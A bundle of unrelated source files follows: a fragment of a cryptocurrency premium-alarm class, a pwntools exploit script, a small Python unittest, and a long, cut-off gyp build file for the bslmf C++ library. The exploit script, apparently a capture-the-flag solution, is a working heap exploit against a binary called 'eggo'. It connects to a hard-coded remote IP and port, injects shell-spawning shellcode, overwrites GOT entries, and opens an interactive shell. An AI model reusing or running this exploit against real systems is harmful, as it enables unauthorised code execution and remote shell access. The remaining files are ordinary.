single_pair_text_string = '\n'.join(pair_text)
return f" Current premium overview:\n{single_pair_text_string}"
def evaluate_alarm(self, symbol_name, threshold: float):
for pair in self.all_pairs:
symbol = CryptoExchangeSymbols.from_string(symbol_name)
if pair.dex_dfi_pair.symbol == symbol.value:
if abs(pair.percentage) >= abs(threshold):
return pair
| 6,825 | 2,258 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template --host 46.101.107.117 --port 2208 ./eggo
from pwn import *
# Set up pwntools for the correct architecture
exe = context.binary = ELF('./eggo')
# libc = ELF('./libc-2.33.so')
# Many built-in settings can be controlled on the command-line and show up
# in "args". For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR
# ./exploit.py GDB HOST=example.com PORT=4141
host = args.HOST or '46.101.107.117'
port = int(args.PORT or 2208)
def start_local(argv=[], *a, **kw):
'''Execute the target binary locally'''
if args.GDB:
return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe.path] + argv, *a, **kw)
def start_remote(argv=[], *a, **kw):
'''Connect to the process on the remote host'''
io = connect(host, port)
if args.GDB:
gdb.attach(io, gdbscript=gdbscript)
return io
def start(argv=[], *a, **kw):
'''Start the exploit against the target.'''
if args.LOCAL:
return start_local(argv, *a, **kw)
else:
return start_remote(argv, *a, **kw)
# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
gdbscript = '''
tbreak main
continue
'''.format(**locals())
#===========================================================
# EXPLOIT GOES HERE
#===========================================================
# Arch: amd64-64-little
# RELRO: Partial RELRO
# Stack: Canary found
# NX: NX enabled
# PIE: No PIE (0x400000)
EGG = 0x004040e0
io = start()
# first allocate memory for egg 0,1,2
eggsize = 64
if eggsize % 8 != 0:
bufsize = eggsize+8
else:
bufsize = eggsize+16
io.recvuntil(b'> ')
io.sendline(b'1\n%d'%eggsize)
print(io.recvline())
io.sendline(b'1\n%d'%eggsize)
print(io.recvline())
io.sendline(b'1\n%d'%eggsize)
print(io.recvline())
# io.sendline(b'1\n24')
# create shellcode, then edit egg 0
sc = asm('nop;'*16 + shellcraft.amd64.linux.sh())
payload = sc + (b'0' * (bufsize-len(sc)-16)) + p64(-8, sign = "signed") + p64(-8, sign = "signed") + p64(exe.got["strlen"]) + p64(0x4052b0)
print('Address of puts: ' , hex(exe.got["puts"]))
print('Address of strlen: ' , hex(exe.got["strlen"]))
# print('Address of puts: ' , p32(exe.got["puts"]))
# payload = cyclic(44, n=4)
io.sendline(b'4\n0')
#io.sendline(b'0'*(bufsize-8) + p64(0x55))
#print(io.recvline())
#io.sendline(b'4\n1')
io.sendline(payload)
print(io.recvline())
# io.sendline(b'3\n0')
# print(io.recvline())
# io.sendline(b'3\n1')
# print(io.recvline())
# io.sendline(b'4\n1')
# io.sendline(b'make me crash')
# print(io.recvline())
# io.sendline(b'3\n0')
# print(io.recvline())
# io.sendline(b'3\n1')
# print(io.recvline())
# now delete egg 0 to execute the shellcode
io.sendline(b'2\n1')
# shellcode = asm(shellcraft.sh())
# payload = fit({
# 32: 0xdeadbeef,
# 'iaaa': [1, 2, 'Hello', 3]
# }, length=128)
# io.send(payload)
# flag = io.recv(...)
# log.success(flag)
with open('payload', 'wb') as outF:
outF.write(b'1\n%d\n1\n%d\n1\n%d\n'%(eggsize,eggsize,eggsize))
outF.write(b'4\n0\n')
outF.write(b'0'*(bufsize-8) + p64(0x54) + b'\n')
outF.write(b'4\n1\n')
outF.write(payload)
outF.write(b'\n2\n1\n')
# log.info("Address of fullname: {}".format(hex(address)))
# log.info("Address of win(): {}".format(hex(exe.symbols["win"])))
# log.info("shellcode:\n{}".format(hexdump(shellcode)))
# payload = shellcode + ('B' * (664-len(shellcode))) + p32(100, sign = "signed") + p32(-4, sign = "signed") + p32(exe.got["puts"] - 12) + p32(address)
# log.info("payload:\n{}".format(hexdump(payload)))
# io.sendlineafter("Input fullname", payload)
# io.sendlineafter("Input lastname", "a")
#print(io.recvline())
io.interactive()
| 3,915 | 1,661 |
import unittest
class MyClass(object):
def __init__(self, foo):
if foo != 1:
raise ValueError("foo is not equal to 1!")
class MyClass2(object):
def __init__(self):
pass
class TestFoo(unittest.TestCase):
def testInsufficientArgs(self):
foo = 0
self.assertRaises(ValueError, MyClass, foo)
def testArgs(self):
self.assertRaises(TypeError, MyClass2, ("fsa", "fds"))
if __name__ == '__main__':
unittest.main() | 481 | 159 |
{
'variables': {
'bslmf_sources': [
'bslmf_addconst.cpp',
'bslmf_addcv.cpp',
'bslmf_addlvaluereference.cpp',
'bslmf_addpointer.cpp',
'bslmf_addreference.cpp',
'bslmf_addrvaluereference.cpp',
'bslmf_addvolatile.cpp',
'bslmf_arraytopointer.cpp',
'bslmf_assert.cpp',
'bslmf_conditional.cpp',
'bslmf_detectnestedtrait.cpp',
'bslmf_enableif.cpp',
'bslmf_forwardingtype.cpp',
'bslmf_functionpointertraits.cpp',
'bslmf_haspointersemantics.cpp',
'bslmf_if.cpp',
'bslmf_integralconstant.cpp',
'bslmf_isarithmetic.cpp',
'bslmf_isarray.cpp',
'bslmf_isbitwiseequalitycomparable.cpp',
'bslmf_isbitwisemoveable.cpp',
'bslmf_isclass.cpp',
'bslmf_isconst.cpp',
'bslmf_isconvertible.cpp',
'bslmf_isconvertibletoany.cpp',
'bslmf_isenum.cpp',
'bslmf_isfloatingpoint.cpp',
'bslmf_isfunction.cpp',
'bslmf_isfundamental.cpp',
'bslmf_isintegral.cpp',
'bslmf_islvaluereference.cpp',
'bslmf_ismemberfunctionpointer.cpp',
'bslmf_ismemberobjectpointer.cpp',
'bslmf_ismemberpointer.cpp',
'bslmf_ispair.cpp',
'bslmf_ispointer.cpp',
'bslmf_ispointertomember.cpp',
'bslmf_ispolymorphic.cpp',
'bslmf_isreference.cpp',
'bslmf_isrvaluereference.cpp',
'bslmf_issame.cpp',
'bslmf_istriviallycopyable.cpp',
'bslmf_istriviallydefaultconstructible.cpp',
'bslmf_isvoid.cpp',
'bslmf_isvolatile.cpp',
'bslmf_matchanytype.cpp',
'bslmf_matcharithmetictype.cpp',
'bslmf_memberfunctionpointertraits.cpp',
'bslmf_metaint.cpp',
'bslmf_nestedtraitdeclaration.cpp',
'bslmf_nil.cpp',
'bslmf_removeconst.cpp',
'bslmf_removecv.cpp',
'bslmf_removecvq.cpp',
'bslmf_removepointer.cpp',
'bslmf_removereference.cpp',
'bslmf_removevolatile.cpp',
'bslmf_selecttrait.cpp',
'bslmf_switch.cpp',
'bslmf_tag.cpp',
'bslmf_typelist.cpp',
],
'bslmf_tests': [
'bslmf_addconst.t',
'bslmf_addcv.t',
'bslmf_addlvaluereference.t',
'bslmf_addpointer.t',
'bslmf_addreference.t',
'bslmf_addrvaluereference.t',
'bslmf_addvolatile.t',
'bslmf_arraytopointer.t',
'bslmf_assert.t',
'bslmf_conditional.t',
'bslmf_detectnestedtrait.t',
'bslmf_enableif.t',
'bslmf_forwardingtype.t',
'bslmf_functionpointertraits.t',
'bslmf_haspointersemantics.t',
'bslmf_if.t',
'bslmf_integralconstant.t',
'bslmf_isarithmetic.t',
'bslmf_isarray.t',
'bslmf_isbitwiseequalitycomparable.t',
'bslmf_isbitwisemoveable.t',
'bslmf_isclass.t',
'bslmf_isconst.t',
'bslmf_isconvertible.t',
'bslmf_isconvertibletoany.t',
'bslmf_isenum.t',
'bslmf_isfloatingpoint.t',
'bslmf_isfunction.t',
'bslmf_isfundamental.t',
'bslmf_isintegral.t',
'bslmf_islvaluereference.t',
'bslmf_ismemberfunctionpointer.t',
'bslmf_ismemberobjectpointer.t',
'bslmf_ismemberpointer.t',
'bslmf_ispair.t',
'bslmf_ispointer.t',
'bslmf_ispointertomember.t',
'bslmf_ispolymorphic.t',
'bslmf_isreference.t',
'bslmf_isrvaluereference.t',
'bslmf_issame.t',
'bslmf_istriviallycopyable.t',
'bslmf_istriviallydefaultconstructible.t',
'bslmf_isvoid.t',
'bslmf_isvolatile.t',
'bslmf_matchanytype.t',
'bslmf_matcharithmetictype.t',
'bslmf_memberfunctionpointertraits.t',
'bslmf_metaint.t',
'bslmf_nestedtraitdeclaration.t',
'bslmf_nil.t',
'bslmf_removeconst.t',
'bslmf_removecv.t',
'bslmf_removecvq.t',
'bslmf_removepointer.t',
'bslmf_removereference.t',
'bslmf_removevolatile.t',
'bslmf_selecttrait.t',
'bslmf_switch.t',
'bslmf_tag.t',
'bslmf_typelist.t',
],
'bslmf_tests_paths': [
'<(PRODUCT_DIR)/bslmf_addconst.t',
'<(PRODUCT_DIR)/bslmf_addcv.t',
'<(PRODUCT_DIR)/bslmf_addlvaluereference.t',
'<(PRODUCT_DIR)/bslmf_addpointer.t',
'<(PRODUCT_DIR)/bslmf_addreference.t',
'<(PRODUCT_DIR)/bslmf_addrvaluereference.t',
'<(PRODUCT_DIR)/bslmf_addvolatile.t',
'<(PRODUCT_DIR)/bslmf_arraytopointer.t',
'<(PRODUCT_DIR)/bslmf_assert.t',
'<(PRODUCT_DIR)/bslmf_conditional.t',
'<(PRODUCT_DIR)/bslmf_detectnestedtrait.t',
'<(PRODUCT_DIR)/bslmf_enableif.t',
'<(PRODUCT_DIR)/bslmf_forwardingtype.t',
'<(PRODUCT_DIR)/bslmf_functionpointertraits.t',
'<(PRODUCT_DIR)/bslmf_haspointersemantics.t',
'<(PRODUCT_DIR)/bslmf_if.t',
'<(PRODUCT_DIR)/bslmf_integralconstant.t',
'<(PRODUCT_DIR)/bslmf_isarithmetic.t',
'<(PRODUCT_DIR)/bslmf_isarray.t',
'<(PRODUCT_DIR)/bslmf_isbitwiseequalitycomparable.t',
'<(PRODUCT_DIR)/bslmf_isbitwisemoveable.t',
'<(PRODUCT_DIR)/bslmf_isclass.t',
'<(PRODUCT_DIR)/bslmf_isconst.t',
'<(PRODUCT_DIR)/bslmf_isconvertible.t',
'<(PRODUCT_DIR)/bslmf_isconvertibletoany.t',
'<(PRODUCT_DIR)/bslmf_isenum.t',
'<(PRODUCT_DIR)/bslmf_isfloatingpoint.t',
'<(PRODUCT_DIR)/bslmf_isfunction.t',
'<(PRODUCT_DIR)/bslmf_isfundamental.t',
'<(PRODUCT_DIR)/bslmf_isintegral.t',
'<(PRODUCT_DIR)/bslmf_islvaluereference.t',
'<(PRODUCT_DIR)/bslmf_ismemberfunctionpointer.t',
'<(PRODUCT_DIR)/bslmf_ismemberobjectpointer.t',
'<(PRODUCT_DIR)/bslmf_ismemberpointer.t',
'<(PRODUCT_DIR)/bslmf_ispair.t',
'<(PRODUCT_DIR)/bslmf_ispointer.t',
'<(PRODUCT_DIR)/bslmf_ispointertomember.t',
'<(PRODUCT_DIR)/bslmf_ispolymorphic.t',
'<(PRODUCT_DIR)/bslmf_isreference.t',
'<(PRODUCT_DIR)/bslmf_isrvaluereference.t',
'<(PRODUCT_DIR)/bslmf_issame.t',
'<(PRODUCT_DIR)/bslmf_istriviallycopyable.t',
'<(PRODUCT_DIR)/bslmf_istriviallydefaultconstructible.t',
'<(PRODUCT_DIR)/bslmf_isvoid.t',
'<(PRODUCT_DIR)/bslmf_isvolatile.t',
'<(PRODUCT_DIR)/bslmf_matchanytype.t',
'<(PRODUCT_DIR)/bslmf_matcharithmetictype.t',
'<(PRODUCT_DIR)/bslmf_memberfunctionpointertraits.t',
'<(PRODUCT_DIR)/bslmf_metaint.t',
'<(PRODUCT_DIR)/bslmf_nestedtraitdeclaration.t',
'<(PRODUCT_DIR)/bslmf_nil.t',
'<(PRODUCT_DIR)/bslmf_removeconst.t',
'<(PRODUCT_DIR)/bslmf_removecv.t',
'<(PRODUCT_DIR)/bslmf_removecvq.t',
'<(PRODUCT_DIR)/bslmf_removepointer.t',
'<(PRODUCT_DIR)/bslmf_removereference.t',
'<(PRODUCT_DIR)/bslmf_removevolatile.t',
'<(PRODUCT_DIR)/bslmf_selecttrait.t',
'<(PRODUCT_DIR)/bslmf_switch.t',
'<(PRODUCT_DIR)/bslmf_tag.t',
'<(PRODUCT_DIR)/bslmf_typelist.t',
],
'bslmf_pkgdeps': [
'../bsls/bsls.gyp:bsls',
'../bslscm/bslscm.gyp:bslscm',
],
},
'targets': [
{
'target_name': 'bslmf_sources',
'type': 'none',
'direct_dependent_settings': {
'sources': [ '<@(bslmf_sources)' ],
'include_dirs': [ '.' ],
},
},
{
'target_name': 'bslmf_tests_build',
'type': 'none',
'dependencies': [ '<@(bslmf_tests)' ],
},
{
'target_name': 'bslmf_tests_run',
'type': 'none',
'dependencies': [ 'bslmf_tests_build' ],
'sources': [ '<@(bslmf_tests_paths)' ],
'rules': [
{
'rule_name': 'run_unit_tests',
'extension': 't',
'inputs': [ '<@(bslmf_tests_paths)' ],
'outputs': [ '<(INTERMEDIATE_DIR)/<(RULE_INPUT_ROOT).t.ran' ],
'action': [ '<(python_path)', '<(DEPTH)/tools/run_unit_tests.py',
'<(RULE_INPUT_PATH)',
'<@(_outputs)',
'--abi=<(ABI_bits)',
'--lib=<(library)'
],
'msvs_cygwin_shell': 0,
},
],
},
{
'target_name': 'bslmf',
'type': '<(library)',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)',
'bslmf_sources', ],
'export_dependent_settings': [ '<@(bslmf_pkgdeps)' ],
'direct_dependent_settings': { 'include_dirs': [ '.' ] },
# Mac OS X empty LD_DYLIB_INSTALL_NAME causes executable and shared
# libraries linking against dylib to store same path for use at runtime
'xcode_settings': { 'LD_DYLIB_INSTALL_NAME': '' },
},
{
'target_name': 'bslmf_addconst.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_addconst.t.cpp' ],
},
{
'target_name': 'bslmf_addcv.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_addcv.t.cpp' ],
},
{
'target_name': 'bslmf_addlvaluereference.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_addlvaluereference.t.cpp' ],
},
{
'target_name': 'bslmf_addpointer.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_addpointer.t.cpp' ],
},
{
'target_name': 'bslmf_addreference.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_addreference.t.cpp' ],
},
{
'target_name': 'bslmf_addrvaluereference.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_addrvaluereference.t.cpp' ],
},
{
'target_name': 'bslmf_addvolatile.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_addvolatile.t.cpp' ],
},
{
'target_name': 'bslmf_arraytopointer.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_arraytopointer.t.cpp' ],
},
{
'target_name': 'bslmf_assert.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_assert.t.cpp' ],
},
{
'target_name': 'bslmf_conditional.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_conditional.t.cpp' ],
},
{
'target_name': 'bslmf_detectnestedtrait.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_detectnestedtrait.t.cpp' ],
},
{
'target_name': 'bslmf_enableif.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_enableif.t.cpp' ],
},
{
'target_name': 'bslmf_forwardingtype.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_forwardingtype.t.cpp' ],
},
{
'target_name': 'bslmf_functionpointertraits.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_functionpointertraits.t.cpp' ],
},
{
'target_name': 'bslmf_haspointersemantics.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_haspointersemantics.t.cpp' ],
},
{
'target_name': 'bslmf_if.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_if.t.cpp' ],
},
{
'target_name': 'bslmf_integralconstant.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_integralconstant.t.cpp' ],
},
{
'target_name': 'bslmf_isarithmetic.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_isarithmetic.t.cpp' ],
},
{
'target_name': 'bslmf_isarray.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_isarray.t.cpp' ],
},
{
'target_name': 'bslmf_isbitwiseequalitycomparable.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_isbitwiseequalitycomparable.t.cpp' ],
},
{
'target_name': 'bslmf_isbitwisemoveable.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_isbitwisemoveable.t.cpp' ],
},
{
'target_name': 'bslmf_isclass.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_isclass.t.cpp' ],
},
{
'target_name': 'bslmf_isconst.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_isconst.t.cpp' ],
},
{
'target_name': 'bslmf_isconvertible.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_isconvertible.t.cpp' ],
},
{
'target_name': 'bslmf_isconvertibletoany.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_isconvertibletoany.t.cpp' ],
},
{
'target_name': 'bslmf_isenum.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_isenum.t.cpp' ],
},
{
'target_name': 'bslmf_isfloatingpoint.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_isfloatingpoint.t.cpp' ],
},
{
'target_name': 'bslmf_isfunction.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_isfunction.t.cpp' ],
},
{
'target_name': 'bslmf_isfundamental.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_isfundamental.t.cpp' ],
},
{
'target_name': 'bslmf_isintegral.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_isintegral.t.cpp' ],
},
{
'target_name': 'bslmf_islvaluereference.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_islvaluereference.t.cpp' ],
},
{
'target_name': 'bslmf_ismemberfunctionpointer.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_ismemberfunctionpointer.t.cpp' ],
},
{
'target_name': 'bslmf_ismemberobjectpointer.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_ismemberobjectpointer.t.cpp' ],
},
{
'target_name': 'bslmf_ismemberpointer.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_ismemberpointer.t.cpp' ],
},
{
'target_name': 'bslmf_ispair.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_ispair.t.cpp' ],
},
{
'target_name': 'bslmf_ispointer.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_ispointer.t.cpp' ],
},
{
'target_name': 'bslmf_ispointertomember.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_ispointertomember.t.cpp' ],
},
{
'target_name': 'bslmf_ispolymorphic.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_ispolymorphic.t.cpp' ],
},
{
'target_name': 'bslmf_isreference.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_isreference.t.cpp' ],
},
{
'target_name': 'bslmf_isrvaluereference.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_isrvaluereference.t.cpp' ],
},
{
'target_name': 'bslmf_issame.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_issame.t.cpp' ],
},
{
'target_name': 'bslmf_istriviallycopyable.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_istriviallycopyable.t.cpp' ],
},
{
'target_name': 'bslmf_istriviallydefaultconstructible.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_istriviallydefaultconstructible.t.cpp' ],
},
{
'target_name': 'bslmf_isvoid.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_isvoid.t.cpp' ],
},
{
'target_name': 'bslmf_isvolatile.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_isvolatile.t.cpp' ],
},
{
'target_name': 'bslmf_matchanytype.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_matchanytype.t.cpp' ],
},
{
'target_name': 'bslmf_matcharithmetictype.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_matcharithmetictype.t.cpp' ],
},
{
'target_name': 'bslmf_memberfunctionpointertraits.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_memberfunctionpointertraits.t.cpp' ],
},
{
'target_name': 'bslmf_metaint.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_metaint.t.cpp' ],
},
{
'target_name': 'bslmf_nestedtraitdeclaration.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_nestedtraitdeclaration.t.cpp' ],
},
{
'target_name': 'bslmf_nil.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_nil.t.cpp' ],
},
{
'target_name': 'bslmf_removeconst.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_removeconst.t.cpp' ],
},
{
'target_name': 'bslmf_removecv.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_removecv.t.cpp' ],
},
{
'target_name': 'bslmf_removecvq.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_removecvq.t.cpp' ],
},
{
'target_name': 'bslmf_removepointer.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_removepointer.t.cpp' ],
},
{
'target_name': 'bslmf_removereference.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_removereference.t.cpp' ],
},
{
'target_name': 'bslmf_removevolatile.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_removevolatile.t.cpp' ],
},
{
'target_name': 'bslmf_selecttrait.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_selecttrait.t.cpp' ],
},
{
'target_name': 'bslmf_switch.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
'include_dirs': [ '.' ],
'sources': [ 'bslmf_switch.t.cpp' ],
},
{
'target_name': 'bslmf_tag.t',
'type': 'executable',
'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps',
'<@(bslmf_pkgdeps)', 'bslmf' ],
